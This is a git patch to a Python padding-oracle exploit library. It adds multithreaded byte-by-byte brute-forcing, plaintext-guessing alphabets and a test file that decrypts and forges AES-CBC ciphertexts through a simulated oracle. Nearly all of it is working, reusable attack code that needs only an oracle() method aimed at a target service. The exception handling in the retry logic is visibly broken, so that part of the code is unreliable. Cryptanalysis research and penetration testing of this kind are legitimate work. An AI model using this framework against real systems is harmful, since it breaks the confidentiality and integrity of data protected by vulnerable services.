From c3d103a10a17f139901effe2c079c199702d9a81 Mon Sep 17 00:00:00 2001 From: Wolfgang Ettlinger Date: Mon, 12 Aug 2019 15:22:30 +0200 Subject: [PATCH] added parallel processing and decryption guessing --- paddingoracle.py | 557 ++++++++++++++++++++++++++--------------------- test.py | 154 +++++++++++++ 2 files changed, 467 insertions(+), 244 deletions(-) create mode 100644 test.py diff --git a/paddingoracle.py b/paddingoracle.py index d772253..6666372 100644 --- a/paddingoracle.py +++ b/paddingoracle.py @@ -3,8 +3,9 @@ Padding Oracle Exploit API ~~~~~~~~~~~~~~~~~~~~~~~~~~ ''' -from itertools import izip, cycle +from itertools import izip, cycle, imap import logging +from multiprocessing.pool import ThreadPool __all__ = [ 'BadPaddingException', @@ -19,6 +20,233 @@ class BadPaddingException(Exception): This Exception type should be raised in :meth:`.PaddingOracle.oracle`. ''' +class ByteNotFoundException(Exception): + ''' + Raised to signal that for the current byte fuzzed, no value was found + that results in a valid padding + ''' + def __init__(self, byte_num): + super(ByteNotFoundException, self).__init__("Byte #%d not found" % byte_num) + +class BlockBuster(object): + ''' + Internally used to handle busting a single block. This class should + not be used by an application. + ''' + def __init__(self, padding_oracle, block, block_size, + plaintext_translation=None, plaintext_after='', **kwargs): + ''' + :param padding_oracle: An instance of :class`PaddingOracle` + :param block: The current block to bust + :param int block_size: Cipher block size (in bytes). + :param plaintext_translation: When set should contain the values each + of the found bytes have to be XORed to to create a valid plain text + :param plaintext_after: The plaintext after this block + ''' + self.log = logging.getLogger(self.__class__.__name__) + self.po = padding_oracle + self.block = block + self.block_size = block_size + self.plaintext_translation = plaintext_translation + self.kwargs = kwargs + + # contains the bytes that have already been identified + self.intermediate_bytes = bytearray(block_size) + self.plaintext_after = plaintext_after + + # the scratchpad for the actual attack + # these bytes are sent to the oracle + self.test_bytes = bytearray(block_size) # '\x00\x00\x00\x00...' + self.test_bytes.extend(block) + + def bust(self): + ''' + Executes the attack for the given block. + ''' + self.log.debug('Processing block %r', str(self.block)) + + for retry in range(self.po.max_retries): + try: + self._bust_internal(self.test_bytes, self.block_size-1) + + return self.intermediate_bytes + except Exception: + self.log.exception('Caught unhandled exception!\n' + 'Decrypted bytes so far: %r\n' + 'Current variables: %r\n', + self.intermediate_bytes, self.__dict__) + raise + except ByteNotFoundException: + self.log.exception('Unable to find a valid padding, retrying...') + + raise RuntimeError('Could not decrypt message in %r within ' + 'maximum allotted retries (%d)' % ( + block, self.max_retries)) + + def _bust_internal(self, test_bytes, byte_num): + ''' + This method is (recursively) called for each byte position to fuzz. + ''' + current_pad_byte = self.block_size - byte_num + next_pad_byte = self.block_size - byte_num + 1 + + # If possible, make an educated guess what the next plain text byte + # might be + if self.plaintext_translation is not None: + # the plain text bytes from this block that are already known... + plaintext_bytes = xor( + self.intermediate_bytes, + self.plaintext_translation + )[byte_num+1:] + + # ... and the plaintext from already busted blocks build + # the currently known plaintext following the byte that is + # currently being busted. + cur_plaintext_after = \ + ''.join([chr(_) for _ in plaintext_bytes]) \ + + self.plaintext_after + + # build an improved alphabet + alphabet = self._build_alphabet(cur_plaintext_after, + current_pad_byte ^ self.plaintext_translation[byte_num]) + else: + # no plain text hints, use standard alphabet + alphabet = list(reversed(range(256))) + + # we need to specifically handle the last byte in a block: + # assuming the current text is ...ab0232 + # we would then hit ...ab0202 - a valid padding + # When we brute force the last byte, when we see a valid padding, + # we expect it to be a 1-byte padding. + # We can figure out that this is happening when we don't + # find a valid padding for the 2nd-last byte. + lastbyte = byte_num == self.block_size - 1 + + while True: + try: + # find the byte that is accepted by the oracle + accepted_byte_index = self._bust_byte(test_bytes, byte_num, alphabet) + + # the variable test_bytes was not modified by _bust_byte + # so we need to update it here + test_bytes[byte_num] = alphabet[accepted_byte_index] + + decrypted_byte = test_bytes[byte_num] ^ current_pad_byte + + self.intermediate_bytes[byte_num] = decrypted_byte + + for k in xrange(byte_num, self.block_size): + # XOR the current test byte with the padding value + # for this round to recover the decrypted byte + test_bytes[k] ^= current_pad_byte + + # XOR it again with the padding byte for the + # next round + test_bytes[k] ^= next_pad_byte + + if byte_num == 0: + # last byte of block is done + return + + # recurively call _bust_internal for the previous byte + self._bust_internal(test_bytes[:], byte_num-1) + return + except ByteNotFoundException: + if not lastbyte: + # the last byte might not be correct + raise + + # we have a 'false positive', at next try only use the + # part of the alphabet we haven't yet used + alphabet = alphabet[accepted_byte_index+1:] + + # we already exhausted the alphabet + if len(alphabet) == 0: + raise + + def _bust_byte(self, test_bytes, byte_num, alphabet): + ''' + Queries the oracle. When configured, uses + multiple threads/processes. + ''' + # clear oracle history for each byte + self.po.history = [] + + jobs = [] + + for i in range(len(alphabet)): + # create a copy that is used only for one job + cur_test_bytes = test_bytes[:] + cur_test_bytes[byte_num] = alphabet[i] + + jobs.append((self.po, i, cur_test_bytes, self.kwargs)) + + res_iter = imap(_worker_fnc, jobs) if self.po.pool is None else\ + self.po.pool.imap_unordered(_worker_fnc, jobs) + + for res in res_iter: + self.po.attempts += 1 + + if res is not None: + return res + + self.log.debug("byte %d not found" % (byte_num)) + + raise ByteNotFoundException(byte_num) + + def _build_alphabet(self, plaintext_after, xor_val): + ''' + Builds an optimized alphabet for decryption. + ''' + alphabet = [] + + def add(it): + for entry in it: + val = ord(entry) ^ xor_val + + if val not in alphabet: + alphabet.append(val) + + if len(plaintext_after) > 0: + next_byte = ord(plaintext_after[0]) + + if (chr(next_byte) * next_byte).startswith(plaintext_after) \ + and len(plaintext_after) < next_byte: + # this might be unfinished padding, expect more padding + add([chr(next_byte)]) + + add(self.po.guess(plaintext_after)) + + s = ' \r\n' + # from https://en.oxforddictionaries.com/explore/which-letters-are-used-most + s += 'eariotnslcudpmhgbfywkvxzjq' + s += 'eariotnslcudpmhgbfywkvxzjq'.upper() + s += '0123456789' + s += '\t!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~' + + add([_ for _ in s]) + + # all other chars + add([chr(_) for _ in range(256)]) + + assert len(alphabet) == 256 + + return alphabet + + +def _worker_fnc(job): + ''' + The function stub that calls the oracle. Must be a top-level function to + avoid problems with pickling it (when using :class`multiprocessing.Pool`). + ''' + po, i, test_bytes, kwargs = job + try: + po.oracle(test_bytes, **kwargs) + + return i + except BadPaddingException: + return None + class PaddingOracle(object): ''' @@ -30,13 +258,15 @@ class PaddingOracle(object): itself within `max_retries`, a :exc:`RuntimeError` is raised. ''' - def __init__(self, **kwargs): + def __init__(self, poolClass=ThreadPool, **kwargs): self.log = logging.getLogger(self.__class__.__name__) self.max_retries = int(kwargs.get('max_retries', 3)) self.attempts = 0 self.history = [] self._decrypted = None self._encrypted = None + self.poolClass = poolClass + self.pool = None def oracle(self, data, **kwargs): ''' @@ -47,24 +277,36 @@ def oracle(self, data, **kwargs): A history of all responses should be stored in :attr:`~.history`, regardless of whether they revealed a Padding Oracle or not. - Responses from :attr:`~.history` are fed to :meth:`analyze` to - help identify padding oracles. :param bytearray data: A bytearray of (fuzzed) encrypted bytes. :raises: :class:`BadPaddingException` if decryption reveals an oracle. ''' raise NotImplementedError - - def analyze(self, **kwargs): + + + def guess(self, plaintext_after): ''' - This method analyzes return :meth:`oracle` values stored in - :attr:`~.history` and returns the most likely - candidate(s) that reveals a padding oracle. + This method is called during the decryption process. Based on + the known plaintext after the currently processed byte, it may + guess what the currently processed byte may be. When the guess + is correct, the decryption is speed up drastically. + + The method must return an iterable containing all guesses in + descending order of likelyhood. + + This mechanism is especially useful if fragments of the plain + text are known. + + :param plaintext_after: the plaintext after the currently + processed byte + :returns: An iterable with guesses for plaintext byte values + (char) ''' - raise NotImplementedError + return [] + - def encrypt(self, plaintext, block_size=8, iv=None, **kwargs): + def encrypt(self, plaintext, block_size=8, iv=None, threads=1, **kwargs): ''' Encrypts *plaintext* by exploiting a Padding Oracle. @@ -75,34 +317,41 @@ def encrypt(self, plaintext, block_size=8, iv=None, **kwargs): or iv is None, the first *block_size* bytes will be null's. :returns: Encrypted data. ''' - pad = block_size - (len(plaintext) % block_size) - plaintext = bytearray(plaintext + chr(pad) * pad) + self.pool = self.poolClass(threads) if threads > 1 else None + + try: + pad = block_size - (len(plaintext) % block_size) + plaintext = bytearray(plaintext + chr(pad) * pad) - self.log.debug('Attempting to encrypt %r bytes', str(plaintext)) + self.log.debug('Attempting to encrypt %r bytes', str(plaintext)) - if iv is not None: - iv = bytearray(iv) - else: - iv = bytearray(block_size) + if iv is not None: + iv = bytearray(iv) + else: + iv = bytearray(block_size) - self._encrypted = encrypted = iv - block = encrypted + self._encrypted = encrypted = iv + block = encrypted - n = len(plaintext + iv) - while n > 0: - intermediate_bytes = self.bust(block, block_size=block_size, - **kwargs) + n = len(plaintext + iv) + while n > 0: + intermediate_bytes = \ + BlockBuster(self, block, block_size=block_size, + **kwargs).bust() - block = xor(intermediate_bytes, - plaintext[n - block_size * 2:n + block_size]) + block = xor(intermediate_bytes, + plaintext[n - block_size * 2:n + block_size]) - encrypted = block + encrypted + encrypted = block + encrypted - n -= block_size + n -= block_size - return encrypted + return encrypted + finally: + if self.pool is not None: + self.pool.terminate() - def decrypt(self, ciphertext, block_size=8, iv=None, **kwargs): + def decrypt(self, ciphertext, block_size=8, iv=None, threads=1, **kwargs): ''' Decrypts *ciphertext* by exploiting a Padding Oracle. @@ -113,154 +362,50 @@ def decrypt(self, ciphertext, block_size=8, iv=None, **kwargs): or iv is None, the first *block_size* bytes will be used. :returns: Decrypted data. ''' - ciphertext = bytearray(ciphertext) - - self.log.debug('Attempting to decrypt %r bytes', str(ciphertext)) - - assert len(ciphertext) % block_size == 0, \ - "Ciphertext not of block size %d" % (block_size, ) - - if iv is not None: - iv, ctext = bytearray(iv), ciphertext - else: - iv, ctext = ciphertext[:block_size], ciphertext[block_size:] - - self._decrypted = decrypted = bytearray(len(ctext)) - - n = 0 - while ctext: - block, ctext = ctext[:block_size], ctext[block_size:] - - intermediate_bytes = self.bust(block, block_size=block_size, - **kwargs) - - # XOR the intermediate bytes with the the previous block (iv) - # to get the plaintext - - decrypted[n:n + block_size] = xor(intermediate_bytes, iv) - - self.log.info('Decrypted block %d: %r', - n / block_size, str(decrypted[n:n + block_size])) - - # Update the IV to that of the current block to be used in the - # next round - - iv = block - n += block_size - - return decrypted - - def bust(self, block, block_size=8, **kwargs): - ''' - A block buster. This method busts one ciphertext block at a time. - This method should not be called directly, instead use - :meth:`decrypt`. - - :param block: - :param int block_size: Cipher block size (in bytes). - :returns: A bytearray containing the decrypted bytes - ''' - intermediate_bytes = bytearray(block_size) - - test_bytes = bytearray(block_size) # '\x00\x00\x00\x00...' - test_bytes.extend(block) - - self.log.debug('Processing block %r', str(block)) + self.pool = self.poolClass(threads) if threads > 1 else None + + try: + ciphertext = bytearray(ciphertext) - retries = 0 - last_ok = 0 - while retries < self.max_retries: + self.log.debug('Attempting to decrypt %r bytes', str(ciphertext)) - # Work on one byte at a time, starting with the last byte - # and moving backwards + assert len(ciphertext) % block_size == 0, \ + "Ciphertext not of block size %d" % (block_size, ) - for byte_num in reversed(xrange(block_size)): - - # clear oracle history for each byte - - self.history = [] - - # Break on first value that returns an oracle, otherwise if we - # don't find a good value it means we have a false positive - # value for the last byte and we need to start all over again - # from the last byte. We can resume where we left off for the - # last byte though. - - r = 256 - if byte_num == block_size - 1 and last_ok > 0: - r = last_ok - - for i in reversed(xrange(r)): - - # Fuzz the test byte - - test_bytes[byte_num] = i - - # If a padding oracle could not be identified from the - # response, this indicates the padding bytes we sent - # were correct. - - try: - self.attempts += 1 - self.oracle(test_bytes[:], **kwargs) - - if byte_num == block_size - 1: - last_ok = i - - except BadPaddingException: - - # TODO - # if a padding oracle was seen in the response, - # do not go any further, try the next byte in the - # sequence. If we're in analysis mode, re-raise the - # BadPaddingException. - - if self.analyze is True: - raise - else: - continue - - except Exception: - self.log.exception('Caught unhandled exception!\n' - 'Decrypted bytes so far: %r\n' - 'Current variables: %r\n', - intermediate_bytes, self.__dict__) - raise - - current_pad_byte = block_size - byte_num - next_pad_byte = block_size - byte_num + 1 - decrypted_byte = test_bytes[byte_num] ^ current_pad_byte - - intermediate_bytes[byte_num] = decrypted_byte - - for k in xrange(byte_num, block_size): - - # XOR the current test byte with the padding value - # for this round to recover the decrypted byte - - test_bytes[k] ^= current_pad_byte + if iv is not None: + iv, ctext = bytearray(iv), ciphertext + else: + iv, ctext = ciphertext[:block_size], ciphertext[block_size:] - # XOR it again with the padding byte for the - # next round + self._decrypted = decrypted = bytearray(len(ctext)) - test_bytes[k] ^= next_pad_byte + temp = iv + ctext + + n = len(ctext) - block_size + while len(temp) > block_size: + plaintext_translation = temp[-2*block_size:-block_size] + block = temp[-block_size:] + temp = temp[:-block_size] - break + intermediate_bytes = BlockBuster(self, block, block_size=block_size, + plaintext_translation=plaintext_translation, + plaintext_after=str(decrypted[n+block_size:]), + **kwargs).bust() - else: - self.log.debug("byte %d not found, restarting" % byte_num) - retries += 1 + # XOR the intermediate bytes with the the previous block (iv) + # to get the plaintext - break - else: - break + decrypted[n:n + block_size] = xor(intermediate_bytes, plaintext_translation) - else: - raise RuntimeError('Could not decrypt byte %d in %r within ' - 'maximum allotted retries (%d)' % ( - byte_num, block, self.max_retries)) + self.log.info('Decrypted block %d: %r', + n / block_size, str(decrypted[n:n + block_size])) - return intermediate_bytes + n -= block_size + + return decrypted + finally: + if self.pool is not None: + self.pool.terminate() def xor(data, key): @@ -268,79 +413,3 @@ def xor(data, key): XOR two bytearray objects with each other. ''' return bytearray([x ^ y for x, y in izip(data, cycle(key))]) - - -def test(): - import os - from Crypto.Cipher import AES - - teststring = 'The quick brown fox jumped over the lazy dog' - - def pkcs7_pad(data, blklen=16): - if blklen > 255: - raise ValueError('Illegal block size %d' % (blklen, )) - pad = (blklen - (len(data) % blklen)) - return data + chr(pad) * pad - - class PadBuster(PaddingOracle): - def oracle(self, data): - _cipher = AES.new(key, AES.MODE_CBC, str(iv)) - ptext = _cipher.decrypt(str(data)) - plen = ord(ptext[-1]) - - padding_is_good = (ptext[-plen:] == chr(plen) * plen) - - if padding_is_good: - return - - raise BadPaddingException - - padbuster = PadBuster() - - for _ in xrange(100): - key = os.urandom(AES.block_size) - iv = bytearray(os.urandom(AES.block_size)) - - print "Testing padding oracle exploit in DECRYPT mode" - cipher = AES.new(key, AES.MODE_CBC, str(iv)) - - data = pkcs7_pad(teststring, blklen=AES.block_size) - ctext = cipher.encrypt(data) - - print "Key: %r" % (key, ) - print "IV: %r" % (iv, ) - print "Plaintext: %r" % (data, ) - print "Ciphertext: %r" % (ctext, ) - - decrypted = padbuster.decrypt(ctext, block_size=AES.block_size, iv=iv) - - print "Decrypted: %r" % (str(decrypted), ) - print "\nRecovered in %d attempts\n" % (padbuster.attempts, ) - - assert decrypted == data, \ - 'Decrypted data %r does not match original %r' % ( - decrypted, data) - - print "Testing padding oracle exploit in ENCRYPT mode" - cipher2 = AES.new(key, AES.MODE_CBC, str(iv)) - - encrypted = padbuster.encrypt(teststring, block_size=AES.block_size) - - print "Key: %r" % (key, ) - print "IV: %r" % (iv, ) - print "Plaintext: %r" % (teststring, ) - print "Ciphertext: %r" % (str(encrypted), ) - - decrypted = cipher2.decrypt(str(encrypted))[AES.block_size:] - decrypted = decrypted.rstrip(decrypted[-1]) - - print "Decrypted: %r" % (str(decrypted), ) - print "\nRecovered in %d attempts" % (padbuster.attempts, ) - - assert decrypted == teststring, \ - 'Encrypted data %r does not decrypt to %r, got %r' % ( - encrypted, teststring, decrypted) - - -if __name__ == '__main__': - test() diff --git a/test.py b/test.py new file mode 100644 index 0000000..7e0a43c --- /dev/null +++ b/test.py @@ -0,0 +1,154 @@ +from paddingoracle import PaddingOracle, BadPaddingException +import os +from Crypto.Cipher import AES +import logging +import time + +TESTSTRING = 'The quick brown fox jumped over the lazy dog' +GUESS_FRAGMENTS = TESTSTRING.split(' ') + + +def pkcs7_pad(data, blklen=16): + if blklen > 255: + raise ValueError('Illegal block size %d' % (blklen, )) + pad = (blklen - (len(data) % blklen)) + return data + chr(pad) * pad + +class PadBuster(PaddingOracle): + def __init__(self, key, iv, delay=None): + super(PadBuster, self).__init__() + self.key = key + self.iv = iv + self.delay = delay + + def oracle(self, data): + if self.delay is not None: + time.sleep(self.delay) + + _cipher = AES.new(self.key, AES.MODE_CBC, str(self.iv)) + ptext = _cipher.decrypt(str(data)) + plen = ord(ptext[-1]) + + padding_is_good = (ptext[-plen:] == chr(plen) * plen) + + if padding_is_good: + return + + raise BadPaddingException + +class GuessingBuster(PadBuster): + def guess(self, plaintext_after): + word_after = plaintext_after + if ' ' in word_after: + word_after = word_after[:word_after.index(' ')] + + for guess in GUESS_FRAGMENTS: + if guess.endswith(word_after): + if guess == word_after: + # word complete -> space + yield ' ' + else: + self.log.info("Guessing {0}", guess) + yield guess[-len(word_after)-1] + +def new_cipher(): + key = os.urandom(AES.block_size) + iv = bytearray(os.urandom(AES.block_size)) + cipher = AES.new(key, AES.MODE_CBC, str(iv)) + + return key, iv, cipher + +def test(): + logging.basicConfig(level=logging.WARN) + + test_decrypt() + test_encrypt() + test_guess() + test_parallel() + +def test_decrypt(): + print "Testing padding oracle exploit in DECRYPT mode" + + for _ in xrange(100): + key, iv, cipher = new_cipher() + padbuster = PadBuster(key, iv) + + data = pkcs7_pad(TESTSTRING, blklen=AES.block_size) + ctext = cipher.encrypt(data) + + decrypted = padbuster.decrypt(ctext, block_size=AES.block_size, iv=iv, + threads=1) + + assert decrypted == data, \ + 'Decrypted data %r does not match original %r' % ( + decrypted, data) + +def test_encrypt(): + print "Testing padding oracle exploit in ENCRYPT mode" + + for _ in xrange(100): + key, iv, cipher = new_cipher() + padbuster = PadBuster(key, iv) + + encrypted = padbuster.encrypt(TESTSTRING, block_size=AES.block_size, + threads=1) + + decrypted = cipher.decrypt(str(encrypted))[AES.block_size:] + decrypted = decrypted.rstrip(decrypted[-1]) + + assert decrypted == TESTSTRING, \ + 'Encrypted data %r does not decrypt to %r, got %r' % ( + encrypted, TESTSTRING, decrypted) + + +def test_guess(): + print "Testing guessing functionality" + + for _ in xrange(100): + key, iv, cipher = new_cipher() + padbuster = PadBuster(key, iv) + guessbuster = GuessingBuster(key, iv) + + data = pkcs7_pad(TESTSTRING, blklen=AES.block_size) + ctext = cipher.encrypt(data) + + decrypted1 = padbuster.decrypt(ctext, block_size=AES.block_size, iv=iv, + threads=1) + + decrypted2 = guessbuster.decrypt(ctext, block_size=AES.block_size, + iv=iv, threads=1) + + assert guessbuster.attempts < padbuster.attempts / 2 + + assert decrypted1 == data and decrypted2 == data, \ + 'Decrypted data do not match original' + + +def test_parallel(): + print "Testing multithreaded functionality" + + def stopwatch(fnc): + before = time.time() + res = fnc() + return res, time.time() - before + + for _ in xrange(1): + key, iv, cipher = new_cipher() + padbuster = PadBuster(key, iv, delay=.02) + + data = pkcs7_pad(TESTSTRING, blklen=AES.block_size) + ctext = cipher.encrypt(data) + + decrypted1, time1 = stopwatch(lambda: padbuster.decrypt(ctext, + block_size=AES.block_size, iv=iv, threads=1)) + + decrypted2, time2 = stopwatch(lambda: padbuster.decrypt(ctext, + block_size=AES.block_size, iv=iv, threads=32)) + + assert time2 < time1 + + assert decrypted1 == data and decrypted2 == data, \ + 'Decrypted data do not match original' + +if __name__ == '__main__': + test()